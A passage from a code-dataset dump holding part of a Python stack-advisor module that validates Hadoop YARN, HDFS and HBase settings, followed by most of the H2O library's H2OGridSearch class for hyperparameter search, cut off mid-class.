'yarn.nodemanager.linux-container-executor.group', \"item\": self.validatorEqualsPropertyItem(properties, \"yarn.nodemanager.linux-container-executor.group\", clusterEnv, \"user_group\")},\n {\"config-name\": 'yarn.scheduler.maximum-allocation-mb', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'yarn.scheduler.maximum-allocation-mb')} ]\n return self.toConfigurationValidationProblems(validationItems, \"yarn-site\")\n\n def validateYARNEnvConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):\n validationItems = [{\"config-name\": 'service_check.queue.name', \"item\": self.validatorYarnQueue(properties, recommendedDefaults, 'service_check.queue.name', services)} ]\n return self.toConfigurationValidationProblems(validationItems, \"yarn-env\")\n\n def validateHbaseEnvConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):\n hbase_site = getSiteProperties(configurations, \"hbase-site\")\n validationItems = [ {\"config-name\": 'hbase_regionserver_heapsize', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'hbase_regionserver_heapsize')},\n {\"config-name\": 'hbase_master_heapsize', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'hbase_master_heapsize')},\n {\"config-name\": \"hbase_user\", \"item\": self.validatorEqualsPropertyItem(properties, \"hbase_user\", hbase_site, \"hbase.superuser\")} ]\n return self.toConfigurationValidationProblems(validationItems, \"hbase-env\")\n\n def validateHDFSConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):\n clusterEnv = getSiteProperties(configurations, \"cluster-env\")\n validationItems = [{\"config-name\": 'dfs.datanode.du.reserved', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'dfs.datanode.du.reserved')},\n {\"config-name\": 'dfs.datanode.data.dir', \"item\": self.validatorOneDataDirPerPartition(properties, 'dfs.datanode.data.dir', services, hosts, clusterEnv)}]\n return self.toConfigurationValidationProblems(validationItems, \"hdfs-site\")\n\n def validateHDFSConfigurationsEnv(self, properties, recommendedDefaults, configurations, services, hosts):\n validationItems = [ {\"config-name\": 'namenode_heapsize', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'namenode_heapsize')},\n {\"config-name\": 'namenode_opt_newsize', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'namenode_opt_newsize')},\n {\"config-name\": 'namenode_opt_maxnewsize', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'namenode_opt_maxnewsize')}]\n return self.toConfigurationValidationProblems(validationItems, \"hadoop-env\")\n\n def validatorOneDataDirPerPartition(self, properties, propertyName, services, hosts, clusterEnv):\n if not propertyName in properties:\n return self.getErrorItem(\"Value should be set\")\n dirs = properties[propertyName]\n\n if not (clusterEnv and \"one_dir_per_partition\" in clusterEnv and clusterEnv[\"one_dir_per_partition\"].lower() == \"true\"):\n return None\n\n dataNodeHosts = self.getDataNodeHosts(services, hosts)\n\n warnings = set()\n for host in dataNodeHosts:\n hostName = host[\"Hosts\"][\"host_name\"]\n\n mountPoints = []\n for diskInfo in host[\"Hosts\"][\"disk_info\"]:\n mountPoints.append(diskInfo[\"mountpoint\"])\n\n if get_mounts_with_multiple_data_dirs(mountPoints, dirs):\n # A detailed message can be too long on large clusters:\n # warnings.append(\"Host: \" + hostName + \"; Mount: \" + mountPoint + \"; Data directories: \" + \", \".join(dirList))\n warnings.add(hostName)\n break;\n\n if len(warnings) > 0:\n return self.getWarnItem(\"cluster-env/one_dir_per_partition is enabled but there are multiple data directories on the same mount. Affected hosts: {0}\".format(\", \".join(sorted(warnings))))\n\n return None\n\n \"\"\"\n Returns the list of Data Node hosts.\n \"\"\"\n def getDataNodeHosts(self, services, hosts):\n if len(hosts[\"items\"]) > 0:\n dataNodeHosts = self.getHostsWithComponent(\"HDFS\", \"DATANODE\", services, hosts)\n if dataNodeHosts is not None:\n return dataNodeHosts\n return []\n\n def getMastersWithMultipleInstances(self):\n return ['ZOOKEEPER_SERVER', 'HBASE_MASTER']\n\n def getNotValuableComponents(self):\n return ['JOURNALNODE', 'ZKFC', 'GANGLIA_MONITOR']\n\n def getNotPreferableOnServerComponents(self):\n return ['GANGLIA_SERVER', 'METRICS_COLLECTOR']\n\n def getCardinalitiesDict(self,host):\n return {\n 'ZOOKEEPER_SERVER': {\"min\": 3},\n 'HBASE_MASTER': {\"min\": 1},\n }\n\n def getComponentLayoutSchemes(self):\n return {\n 'NAMENODE': {\"else\": 0},\n 'SECONDARY_NAMENODE': {\"else\": 1},\n 'HBASE_MASTER': {6: 0, 31: 2, \"else\": 3},\n\n 'HISTORYSERVER': {31: 1, \"else\": 2},\n 'RESOURCEMANAGER': {31: 1, \"else\": 2},\n\n 'OOZIE_SERVER': {6: 1, 31: 2, \"else\": 3},\n\n 'HIVE_SERVER': {6: 1, 31: 2, \"else\": 4},\n 'HIVE_METASTORE': {6: 1, 31: 2, \"else\": 4},\n 'WEBHCAT_SERVER': {6: 1, 31: 2, \"else\": 4},\n 'METRICS_COLLECTOR': {3: 2, 6: 2, 31: 3, \"else\": 5},\n }\n\n def get_system_min_uid(self):\n login_defs = '/etc/login.defs'\n uid_min_tag = 'UID_MIN'\n comment_tag = '#'\n uid_min = uid_default = '1000'\n uid = None\n\n if os.path.exists(login_defs):\n with open(login_defs, 'r') as f:\n data = f.read().split('\\n')\n # look for uid_min_tag in file\n uid = filter(lambda x: uid_min_tag in x, data)\n # filter all lines, where uid_min_tag was found in comments\n uid = filter(lambda x: x.find(comment_tag) > x.find(uid_min_tag) or x.find(comment_tag) == -1, uid)\n\n if uid is not None and len(uid) > 0:\n uid = uid[0]\n comment = uid.find(comment_tag)\n tag = uid.find(uid_min_tag)\n if comment == -1:\n uid_tag = tag + len(uid_min_tag)\n uid_min = uid[uid_tag:].strip()\n elif comment > tag:\n uid_tag = tag + len(uid_min_tag)\n uid_min = uid[uid_tag:comment].strip()\n\n # check result for value\n try:\n int(uid_min)\n except ValueError:\n return uid_default\n\n return uid_min\n\n def mergeValidators(self, parentValidators, childValidators):\n for service, configsDict in childValidators.iteritems():\n if service not in parentValidators:\n parentValidators[service] = {}\n parentValidators[service].update(configsDict)\n\n def checkSiteProperties(self, siteProperties, *propertyNames):\n \"\"\"\n Check if properties defined in site properties.\n :param siteProperties: config properties dict\n :param *propertyNames: property names to validate\n :returns: True if all properties defined, in other cases returns False\n \"\"\"\n if siteProperties is None:\n return False\n for name in propertyNames:\n if not (name in siteProperties):\n return False\n return True\n\n \"\"\"\n Returns the dictionary of configs for 'capacity-scheduler'.\n \"\"\"\n def getCapacitySchedulerProperties(self, services):\n capacity_scheduler_properties = dict()\n received_as_key_value_pair = True\n if \"capacity-scheduler\" in services['configurations']:\n if \"capacity-scheduler\" in services['configurations'][\"capacity-scheduler\"][\"properties\"]:\n cap_sched_props_as_str = services['configurations'][\"capacity-scheduler\"][\"properties\"][\"capacity-scheduler\"]\n if cap_sched_props_as_str:\n cap_sched_props_as_str = str(cap_sched_props_as_str).split('\\n')\n if len(cap_sched_props_as_str) > 0 and cap_sched_props_as_str[0] != 'null':\n # Received confgs as one \"\\n\" separated string\n for property in cap_sched_props_as_str:\n key, sep, value = property.partition(\"=\")\n capacity_scheduler_properties[key] = value\n Logger.info(\"'capacity-scheduler' configs is passed-in as a single '\\\\n' separated string. \"\n \"count(services['configurations']['capacity-scheduler']['properties']['capacity-scheduler']) = \"\n \"{0}\".format(len(capacity_scheduler_properties)))\n received_as_key_value_pair = False\n else:\n Logger.info(\"Passed-in services['configurations']['capacity-scheduler']['properties']['capacity-scheduler'] is 'null'.\")\n else:\n Logger.info(\"'capacity-schdeuler' configs not passed-in as single '\\\\n' string in \"\n \"services['configurations']['capacity-scheduler']['properties']['capacity-scheduler'].\")\n if not capacity_scheduler_properties:\n # Received configs as a dictionary (Generally on 1st invocation).\n capacity_scheduler_properties = services['configurations'][\"capacity-scheduler\"][\"properties\"]\n Logger.info(\"'capacity-scheduler' configs is passed-in as a dictionary. \"\n \"count(services['configurations']['capacity-scheduler']['properties']) = {0}\".format(len(capacity_scheduler_properties)))\n else:\n Logger.error(\"Couldn't retrieve 'capacity-scheduler' from services.\")\n\n Logger.info(\"Retrieved 'capacity-scheduler' received as dictionary : '{0}'. configs : {1}\" \\\n .format(received_as_key_value_pair, capacity_scheduler_properties.items()))\n return capacity_scheduler_properties, received_as_key_value_pair\n\n \"\"\"\n Gets all YARN leaf queues.\n \"\"\"\n def getAllYarnLeafQueues(self, capacitySchedulerProperties):\n config_list = capacitySchedulerProperties.keys()\n yarn_queues = None\n leafQueueNames = set()\n if 'yarn.scheduler.capacity.root.queues' in config_list:\n yarn_queues = capacitySchedulerProperties.get('yarn.scheduler.capacity.root.queues')\n\n if yarn_queues:\n toProcessQueues = yarn_queues.split(\",\")\n while len(toProcessQueues) > 0:\n queue = toProcessQueues.pop()\n queueKey = \"yarn.scheduler.capacity.root.\" + queue + \".queues\"\n if queueKey in capacitySchedulerProperties:\n # If parent queue, add children\n subQueues = capacitySchedulerProperties[queueKey].split(\",\")\n for subQueue in subQueues:\n toProcessQueues.append(queue + \".\" + subQueue)\n else:\n # Leaf queues\n # We only take the leaf queue name instead of the complete path, as leaf queue names are unique in YARN.\n # Eg: If YARN queues are like :\n # (1). 'yarn.scheduler.capacity.root.a1.b1.c1.d1',\n # (2). 'yarn.scheduler.capacity.root.a1.b1.c2',\n # (3). 'yarn.scheduler.capacity.root.default,\n # Added leaf queues names are as : d1, c2 and default for the 3 leaf queues.\n leafQueuePathSplits = queue.split(\".\")\n if leafQueuePathSplits > 0:\n leafQueueName = leafQueuePathSplits[-1]\n leafQueueNames.add(leafQueueName)\n return leafQueueNames\n\n def get_service_component_meta(self, service, component, services):\n \"\"\"\n Function retrieve service component meta information as dict from services.json\n If no service or component found, would be returned empty dict\n\n Return value example:\n \"advertise_version\" : true,\n \"bulk_commands_display_name\" : \"\",\n \"bulk_commands_master_component_name\" : \"\",\n \"cardinality\" : \"1+\",\n \"component_category\" : \"CLIENT\",\n \"component_name\" : \"HBASE_CLIENT\",\n \"custom_commands\" : [ ],\n \"decommission_allowed\" : false,\n \"display_name\" : \"HBase Client\",\n \"has_bulk_commands_definition\" : false,\n \"is_client\" : true,\n \"is_master\" : false,\n \"reassign_allowed\" : false,\n \"recovery_enabled\" : false,\n \"service_name\" : \"HBASE\",\n \"stack_name\" : \"HDP\",\n \"stack_version\" : \"2.5\",\n \"hostnames\" : [ \"host1\", \"host2\" ]\n\n :type service str\n :type component str\n :type services dict\n :rtype dict\n \"\"\"\n __stack_services = \"StackServices\"\n __stack_service_components = \"StackServiceComponents\"\n\n if not services:\n return {}\n\n service_meta = [item for item in services[\"services\"] if item[__stack_services][\"service_name\"] == service]\n if len(service_meta) == 0:\n return {}\n\n service_meta = service_meta[0]\n component_meta = [item for item in service_meta[\"components\"] if item[__stack_service_components][\"component_name\"] == component]\n\n if len(component_meta) == 0:\n return {}\n\n return component_meta[0][__stack_service_components]\n\n def is_secured_cluster(self, services):\n \"\"\"\n Detects if cluster is secured or not\n :type services dict\n :rtype bool\n \"\"\"\n return services and \"cluster-env\" in services[\"configurations\"] and\\\n \"security_enabled\" in services[\"configurations\"][\"cluster-env\"][\"properties\"] and\\\n services[\"configurations\"][\"cluster-env\"][\"properties\"][\"security_enabled\"].lower() == \"true\"\n\n def get_services_list(self, services):\n \"\"\"\n Returns available services as list\n\n :type services dict\n :rtype list\n \"\"\"\n if not services:\n return []\n\n return [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]\n\n def get_components_list(self, service, services):\n \"\"\"\n Return list of components for specific service\n :type service str\n :type services dict\n :rtype list\n \"\"\"\n __stack_services = \"StackServices\"\n __stack_service_components = \"StackServiceComponents\"\n\n if not services:\n return []\n\n service_meta = [item for item in services[\"services\"] if item[__stack_services][\"service_name\"] == service]\n if len(service_meta) == 0:\n return []\n\n service_meta = service_meta[0]\n return [item[__stack_service_components][\"component_name\"] for item in service_meta[\"components\"]]\n\n\ndef getOldValue(self, services, configType, propertyName):\n if services:\n if 'changed-configurations' in services.keys():\n changedConfigs = services[\"changed-configurations\"]\n for changedConfig in changedConfigs:\n if changedConfig[\"type\"] == configType and changedConfig[\"name\"]== propertyName and \"old_value\" in changedConfig:\n return changedConfig[\"old_value\"]\n return None\n\n# Validation helper methods\ndef getSiteProperties(configurations, siteName):\n siteConfig = configurations.get(siteName)\n if siteConfig is None:\n return None\n return siteConfig.get(\"properties\")\n\ndef getServicesSiteProperties(services, siteName):\n configurations = services.get(\"configurations\")\n if not configurations:\n return None\n siteConfig = configurations.get(siteName)\n if siteConfig is None:\n return None\n return siteConfig.get(\"properties\")\n\ndef to_number(s):\n try:\n return int(re.sub(\"\\D\", \"\", s))\n except ValueError:\n return None\n\ndef checkXmxValueFormat(value):\n p = re.compile('-Xmx(\\d+)(b|k|m|g|p|t|B|K|M|G|P|T)?')\n matches = p.findall(value)\n return len(matches) == 1\n\ndef getXmxSize(value):\n p = re.compile(\"-Xmx(\\d+)(.?)\")\n result = p.findall(value)[0]\n if len(result) > 1:\n # result[1] - is a space or size formatter (b|k|m|g etc)\n return result[0] + result[1].lower()\n return result[0]\n\ndef formatXmxSizeToBytes(value):\n value = value.lower()\n if len(value) == 0:\n return 0\n modifier = value[-1]\n\n if modifier == ' ' or modifier in \"0123456789\":\n modifier = 'b'\n m = {\n modifier == 'b': 1,\n modifier == 'k': 1024,\n modifier == 'm': 1024 * 1024,\n modifier == 'g': 1024 * 1024 * 1024,\n modifier == 't': 1024 * 1024 * 1024 * 1024,\n modifier == 'p': 1024 * 1024 * 1024 * 1024 * 1024\n }[1]\n return to_number(value) * m\n\ndef getPort(address):\n \"\"\"\n Extracts port from the address like 0.0.0.0:1019\n \"\"\"\n if address is None:\n return None\n m = re.search(r'(?:http(?:s)?://)?([\\w\\d.]*):(\\d{1,5})', address)\n if m is not None:\n return int(m.group(2))\n else:\n return None\n\ndef isSecurePort(port):\n \"\"\"\n Returns True if port is root-owned at *nix systems\n \"\"\"\n if port is not None:\n return port < 1024\n else:\n return False\n\ndef getMountPointForDir(dir, mountPoints):\n \"\"\"\n :param dir: Directory to check, even if it doesn't exist.\n :return: Returns the closest mount point as a string for the directory.\n if the \"dir\" variable is None, will return None.\n If the directory does not exist, will return \"/\".\n \"\"\"\n bestMountFound = None\n if dir:\n dir = re.sub(\"^file://\", \"\", dir, count=1).strip().lower()\n\n # If the path is \"/hadoop/hdfs/data\", then possible matches for mounts could be\n # \"/\", \"/hadoop/hdfs\", and \"/hadoop/hdfs/data\".\n # So take the one with the greatest number of segments.\n for mountPoint in mountPoints:\n # Ensure that the mount path and the dir path ends with \"/\"\n # The mount point \"/hadoop\" should not match with the path \"/hadoop1\"\n if os.path.join(dir, \"\").startswith(os.path.join(mountPoint, \"\")):\n if bestMountFound is None:\n bestMountFound = mountPoint\n elif os.path.join(bestMountFound, \"\").count(os.path.sep) < os.path.join(mountPoint, \"\").count(os.path.sep):\n bestMountFound = mountPoint\n\n return bestMountFound\n\ndef getHeapsizeProperties():\n return { \"NAMENODE\": [{\"config-name\": \"hadoop-env\",\n \"property\": \"namenode_heapsize\",\n \"default\": \"1024m\"}],\n \"DATANODE\": [{\"config-name\": \"hadoop-env\",\n \"property\": \"dtnode_heapsize\",\n \"default\": \"1024m\"}],\n \"REGIONSERVER\": [{\"config-name\": \"hbase-env\",\n \"property\": \"hbase_regionserver_heapsize\",\n \"default\": \"1024m\"}],\n \"HBASE_MASTER\": [{\"config-name\": \"hbase-env\",\n \"property\": \"hbase_master_heapsize\",\n \"default\": \"1024m\"}],\n \"HIVE_CLIENT\": [{\"config-name\": \"hive-site\",\n \"property\": \"hive.heapsize\",\n \"default\": \"1024m\"}],\n \"HISTORYSERVER\": [{\"config-name\": \"mapred-env\",\n \"property\": \"jobhistory_heapsize\",\n \"default\": \"1024m\"}],\n \"OOZIE_SERVER\": [{\"config-name\": \"oozie-env\",\n \"property\": \"oozie_heapsize\",\n \"default\": \"1024m\"}],\n \"RESOURCEMANAGER\": [{\"config-name\": \"yarn-env\",\n \"property\": \"resourcemanager_heapsize\",\n \"default\": \"1024m\"}],\n \"NODEMANAGER\": [{\"config-name\": \"yarn-env\",\n \"property\": \"nodemanager_heapsize\",\n \"default\": \"1024m\"}],\n \"APP_TIMELINE_SERVER\": [{\"config-name\": \"yarn-env\",\n \"property\": \"apptimelineserver_heapsize\",\n \"default\": \"1024m\"}],\n \"ZOOKEEPER_SERVER\": [{\"config-name\": \"zookeeper-env\",\n \"property\": \"zookeeper_heapsize\",\n \"default\": \"1024m\"}],\n \"METRICS_COLLECTOR\": [{\"config-name\": \"ams-hbase-env\",\n \"property\": \"hbase_master_heapsize\",\n \"default\": \"1024\"},\n {\"config-name\": \"ams-hbase-env\",\n \"property\": \"hbase_regionserver_heapsize\",\n \"default\": \"1024\"},\n {\"config-name\": \"ams-env\",\n \"property\": \"metrics_collector_heapsize\",\n \"default\": \"512\"}],\n \"ATLAS_SERVER\": [{\"config-name\": \"atlas-env\",\n \"property\": \"atlas_server_xmx\",\n \"default\": \"2048\"}]\n }\n\ndef getMemorySizeRequired(components, configurations):\n totalMemoryRequired = 512*1024*1024 # 512Mb for OS needs\n for component in components:\n if component in getHeapsizeProperties().keys():\n heapSizeProperties = getHeapsizeProperties()[component]\n for heapSizeProperty in heapSizeProperties:\n try:\n properties = configurations[heapSizeProperty[\"config-name\"]][\"properties\"]\n heapsize = properties[heapSizeProperty[\"property\"]]\n except KeyError:\n heapsize = heapSizeProperty[\"default\"]\n\n # Assume Mb if no modifier\n if len(heapsize) > 1 and heapsize[-1] in '0123456789':\n heapsize = str(heapsize) + \"m\"\n\n totalMemoryRequired += formatXmxSizeToBytes(heapsize)\n\n return totalMemoryRequired\n\ndef round_to_n(mem_size, n=128):\n return int(round(mem_size / float(n))) * int(n)\n"} {"ext": "py", "sha": "1a2fa11f07440aff970ba75f83f5d80a1d284b01", "content": "# -*- encoding: utf-8 -*-\nfrom __future__ import division, print_function, absolute_import, unicode_literals\n\nimport itertools\n\nimport h2o\nfrom h2o.job import H2OJob\nfrom h2o.frame import H2OFrame\nfrom h2o.exceptions import H2OValueError\nfrom h2o.estimators.estimator_base import H2OEstimator\nfrom h2o.two_dim_table import H2OTwoDimTable\nfrom h2o.display import H2ODisplay\nfrom h2o.grid.metrics import * # NOQA\nfrom h2o.utils.backward_compatibility import backwards_compatible\nfrom h2o.utils.shared_utils import deprecated, quoted\nfrom h2o.utils.compatibility import * # NOQA\nfrom h2o.utils.typechecks import assert_is_type, is_type\n\n\nclass H2OGridSearch(backwards_compatible()):\n \"\"\"\n Grid Search of a Hyper-Parameter Space for a Model\n\n :param model: The type of model to be explored initialized with optional parameters that will be\n unchanged across explored models.\n :param hyper_params: A dictionary of string parameters (keys) and a list of values to be explored by grid\n search (values).\n :param str grid_id: The unique id assigned to the resulting grid object. If none is given, an id will\n automatically be generated.\n :param search_criteria: A dictionary of directives which control the search of the hyperparameter space.\n The default strategy \"Cartesian\" covers the entire space of hyperparameter combinations. Specify the\n \"RandomDiscrete\" strategy to get random search of all the combinations of your hyperparameters.\n RandomDiscrete should usually be combined with at least one early stopping criterion: max_models\n and/or max_runtime_secs, e.g::\n\n >>> criteria = {\"strategy\": \"RandomDiscrete\", \"max_models\": 42,\n ... \"max_runtime_secs\": 28800, \"seed\": 1234}\n >>> criteria = {\"strategy\": \"RandomDiscrete\", \"stopping_metric\": \"AUTO\",\n ... \"stopping_tolerance\": 0.001, \"stopping_rounds\": 10}\n >>> criteria = {\"strategy\": \"RandomDiscrete\", \"stopping_rounds\": 5,\n ... \"stopping_metric\": \"misclassification\",\n ... \"stopping_tolerance\": 0.00001}\n :returns: a new H2OGridSearch instance\n\n Examples\n --------\n >>> from h2o.grid.grid_search import H2OGridSearch\n >>> from h2o.estimators.glm import H2OGeneralizedLinearEstimator\n >>> hyper_parameters = {'alpha': [0.01,0.5], 'lambda': [1e-5,1e-6]}\n >>> gs = H2OGridSearch(H2OGeneralizedLinearEstimator(family='binomial'), hyper_parameters)\n >>> training_data = h2o.import_file(\"smalldata/logreg/benign.csv\")\n >>> gs.train(x=range(3) + range(4,11),y=3, training_frame=training_data)\n >>> gs.show()\n \"\"\"\n\n\n def __init__(self, model, hyper_params, grid_id=None, search_criteria=None, export_checkpoints_dir=None):\n super(H2OGridSearch, self).__init__()\n assert_is_type(model, None, H2OEstimator, lambda mdl: issubclass(mdl, H2OEstimator))\n assert_is_type(hyper_params, dict)\n assert_is_type(grid_id, None, str)\n assert_is_type(search_criteria, None, dict)\n if not (model is None or is_type(model, H2OEstimator)): model = model()\n self._id = grid_id\n self.model = model\n self.hyper_params = dict(hyper_params)\n self.search_criteria = None if search_criteria is None else dict(search_criteria)\n self.export_checkpoints_dir = export_checkpoints_dir\n self._grid_json = None\n self.models = None # list of H2O Estimator instances\n self._parms = {} # internal, for object recycle #\n self.parms = {} # external#\n self._future = False # used by __repr__/show to query job state#\n self._job = None # used when _future is True#\n\n\n @property\n def grid_id(self):\n \"\"\"A key that identifies this grid search object in H2O.\"\"\"\n return self._id\n\n @grid_id.setter\n def grid_id(self, value):\n oldname = self.grid_id\n self._id = value\n h2o.rapids('(rename \"{}\" \"{}\")'.format(oldname, value))\n\n\n @property\n def model_ids(self):\n return [i['name'] for i in self._grid_json[\"model_ids\"]]\n\n\n @property\n def hyper_names(self):\n return self._grid_json[\"hyper_names\"]\n\n\n @property\n def failed_params(self):\n return self._grid_json.get(\"failed_params\", None)\n\n\n @property\n def failure_details(self):\n return self._grid_json.get(\"failure_details\", None)\n\n\n @property\n def failure_stack_traces(self):\n return self._grid_json.get(\"failure_stack_traces\", None)\n\n\n @property\n def failed_raw_params(self):\n return self._grid_json.get(\"failed_raw_params\", None)\n\n\n def start(self, x, y=None, training_frame=None, offset_column=None, fold_column=None, weights_column=None,\n validation_frame=None, **params):\n \"\"\"\n Asynchronous model build by specifying the predictor columns, response column, and any\n additional frame-specific values.\n\n To block for results, call :meth:`join`.\n\n :param x: A list of column names or indices indicating the predictor columns.\n :param y: An index or a column name indicating the response column.\n :param training_frame: The H2OFrame having the columns indicated by x and y (as well as any\n additional columns specified by fold, offset, and weights).\n :param offset_column: The name or index of the column in training_frame that holds the offsets.\n :param fold_column: The name or index of the column in training_frame that holds the per-row fold\n assignments.\n :param weights_column: The name or index of the column in training_frame that holds the per-row weights.\n :param validation_frame: H2OFrame with validation data to be scored on while training.\n \"\"\"\n self._future = True\n self.train(x=x,\n y=y,\n training_frame=training_frame,\n offset_column=offset_column,\n fold_column=fold_column,\n weights_column=weights_column,\n validation_frame=validation_frame,\n **params)\n\n\n def join(self):\n \"\"\"Wait until grid finishes computing.\"\"\"\n self._future = False\n self._job.poll()\n self._job = None\n\n\n def train(self, x=None, y=None, training_frame=None, offset_column=None, fold_column=None, weights_column=None,\n validation_frame=None, **params):\n \"\"\"\n Train the model synchronously (i.e. do not return until the model finishes training).\n\n To train asynchronously call :meth:`start`.\n\n :param x: A list of column names or indices indicating the predictor columns.\n :param y: An index or a column name indicating the response column.\n :param training_frame: The H2OFrame having the columns indicated by x and y (as well as any\n additional columns specified by fold, offset, and weights).\n :param offset_column: The name or index of the column in training_frame that holds the offsets.\n :param fold_column: The name or index of the column in training_frame that holds the per-row fold\n assignments.\n :param weights_column: The name or index of the column in training_frame that holds the per-row weights.\n :param validation_frame: H2OFrame with validation data to be scored on while training.\n \"\"\"\n algo_params = locals()\n parms = self._parms.copy()\n parms.update({k: v for k, v in algo_params.items() if k not in [\"self\", \"params\", \"algo_params\", \"parms\"]})\n # dictionaries have special handling in grid search, avoid the implicit conversion\n parms[\"search_criteria\"] = None if self.search_criteria is None else str(self.search_criteria)\n parms[\"export_checkpoints_dir\"] = self.export_checkpoints_dir\n parms[\"hyper_parameters\"] = None if self.hyper_params is None else str(self.hyper_params) # unique to grid search\n parms.update({k: v for k, v in list(self.model._parms.items()) if v is not None}) # unique to grid search\n parms.update(params)\n if '__class__' in parms: # FIXME: hackt for PY3\n del parms['__class__']\n y = algo_params[\"y\"]\n tframe = algo_params[\"training_frame\"]\n if tframe is None: raise ValueError(\"Missing training_frame\")\n if y is not None:\n if is_type(y, list, tuple):\n if len(y) == 1:\n parms[\"y\"] = y[0]\n else:\n raise ValueError('y must be a single column reference')\n if x is None:\n if(isinstance(y, int)):\n xset = set(range(training_frame.ncols)) - {y}\n else:\n xset = set(training_frame.names) - {y}\n else:\n xset = set()\n if is_type(x, int, str): x = [x]\n for xi in x:\n if is_type(xi, int):\n if not (-training_frame.ncols <= xi < training_frame.ncols):\n raise H2OValueError(\"Column %d does not exist in the training frame\" % xi)\n xset.add(training_frame.names[xi])\n else:\n if xi not in training_frame.names:\n raise H2OValueError(\"Column %s not in the training frame\" % xi)\n xset.add(xi)\n x = list(xset)\n parms[\"x\"] = x\n self.build_model(parms)\n\n\n def build_model(self, algo_params):\n \"\"\"(internal)\"\"\"\n if algo_params[\"training_frame\"] is None: raise ValueError(\"Missing training_frame\")\n x = algo_params.pop(\"x\")\n y = algo_params.pop(\"y\", None)\n training_frame = algo_params.pop(\"training_frame\")\n validation_frame = algo_params.pop(\"validation_frame\", None)\n is_auto_encoder = (algo_params is not None) and (\"autoencoder\" in algo_params and algo_params[\"autoencoder\"])\n algo = self.model._compute_algo() # unique to grid search\n is_unsupervised = is_auto_encoder or algo == \"pca\" or algo == \"svd\" or algo == \"kmeans\" or algo == \"glrm\"\n if is_auto_encoder and y is not None: raise ValueError(\"y should not be specified for autoencoder.\")\n if not is_unsupervised and y is None: raise ValueError(\"Missing response\")\n if not is_unsupervised:\n y = y if y in training_frame.names else training_frame.names[y]\n self.model._estimator_type = \"classifier\" if training_frame.types[y] == \"enum\" else \"regressor\"\n self._model_build(x, y, training_frame, validation_frame, algo_params)\n\n\n def _model_build(self, x, y, tframe, vframe, kwargs):\n kwargs['training_frame'] = tframe\n if vframe is not None: kwargs[\"validation_frame\"] = vframe\n if is_type(y, int): y = tframe.names[y]\n if y is not None: kwargs['response_column'] = y\n if not is_type(x, list, tuple): x = [x]\n if is_type(x[0], int):\n x = [tframe.names[i] for i in x]\n offset = kwargs[\"offset_column\"]\n folds = kwargs[\"fold_column\"]\n weights = kwargs[\"weights_column\"]\n ignored_columns = list(set(tframe.names) - set(x + [y, offset, folds, weights]))\n kwargs[\"ignored_columns\"] = None if not ignored_columns else [quoted(col) for col in ignored_columns]\n kwargs = dict([(k, kwargs[k].frame_id if isinstance(kwargs[k], H2OFrame) else kwargs[k]) for k in kwargs if\n kwargs[k] is not None]) # gruesome one-liner\n algo = self.model._compute_algo() # unique to grid search\n if self.grid_id is not None: kwargs[\"grid_id\"] = self.grid_id\n rest_ver = kwargs.pop(\"_rest_version\") if \"_rest_version\" in kwargs else None\n\n grid = H2OJob(h2o.api(\"POST /99/Grid/%s\" % algo, data=kwargs), job_type=(algo + \" Grid Build\"))\n\n if self._future:\n self._job = grid\n return\n\n grid.poll()\n\n grid_json = h2o.api(\"GET /99/Grids/%s\" % (grid.dest_key))\n failure_messages_stacks = \"\"\n error_index = 0\n if len(grid_json[\"failure_details\"]) > 0:\n print(\"Errors/Warnings building gridsearch model\\n\")\n# will raise error if no grid model is returned, store error messages here\n\n for error_message in grid_json[\"failure_details\"]:\n if isinstance(grid_json[\"failed_params\"][error_index], dict):\n for h_name in grid_json['hyper_names']:\n print(\"Hyper-parameter: {0}, {1}\".format(h_name,\n grid_json['failed_params'][error_index][h_name]))\n\n if len(grid_json[\"failure_stack_traces\"]) > error_index:\n print(\"failure_details: {0}\\nfailure_stack_traces: \"\n \"{1}\\n\".format(error_message, grid_json['failure_stack_traces'][error_index]))\n failure_messages_stacks += error_message+'\\n'\n error_index += 1\n\n self.models = [h2o.get_model(key['name']) for key in grid_json['model_ids']]\n for model in self.models:\n model._estimator_type = self.model._estimator_type\n\n # get first model returned in list of models from grid search to get model class (binomial, multinomial, etc)\n # sometimes no model is returned due to bad parameter values provided by the user.\n if len(grid_json['model_ids']) > 0:\n first_model_json = h2o.api(\"GET /%d/Models/%s\" %\n (rest_ver or 3, grid_json['model_ids'][0]['name']))['models'][0]\n self._resolve_grid(grid.dest_key, grid_json, first_model_json)\n else:\n if len(failure_messages_stacks)>0:\n raise ValueError(failure_messages_stacks)\n else:\n raise ValueError(\"Gridsearch returns no model due to bad parameter values or other reasons....\")\n\n\n def _resolve_grid(self, grid_id, grid_json, first_model_json):\n model_class = H2OGridSearch._metrics_class(first_model_json)\n m = model_class()\n m._id = grid_id\n m._grid_json = grid_json\n # m._metrics_class = metrics_class\n m._parms = self._parms\n self.export_checkpoints_dir = m._grid_json[\"export_checkpoints_dir\"]\n H2OEstimator.mixin(self, model_class)\n self.__dict__.update(m.__dict__.copy())\n\n\n def __getitem__(self, item):\n return self.models[item]\n\n\n def __iter__(self):\n nmodels = len(self.models)\n return (self[i] for i in range(nmodels))\n\n\n def __len__(self):\n return len(self.models)\n\n\n def __repr__(self):\n self.show()\n return \"\"\n\n\n def predict(self, test_data):\n \"\"\"\n Predict on a dataset.\n\n :param H2OFrame test_data: Data to be predicted on.\n :returns: H2OFrame filled with predictions.\n \"\"\"\n return {model.model_id: model.predict(test_data) for model in self.models}\n\n\n def is_cross_validated(self):\n \"\"\"Return True if the model was cross-validated.\"\"\"\n return {model.model_id: model.is_cross_validated() for model in self.models}\n\n\n def xval_keys(self):\n \"\"\"Model keys for the cross-validated model.\"\"\"\n return {model.model_id: model.xval_keys() for model in self.models}\n\n\n def get_xval_models(self, key=None):\n \"\"\"\n Return a Model object.\n\n :param str key: If None, return all cross-validated models; otherwise return the model\n specified by the key.\n :returns: A model or a list of models.\n \"\"\"\n return {model.model_id: model.get_xval_models(key) for model in self.models}\n\n\n def xvals(self):\n 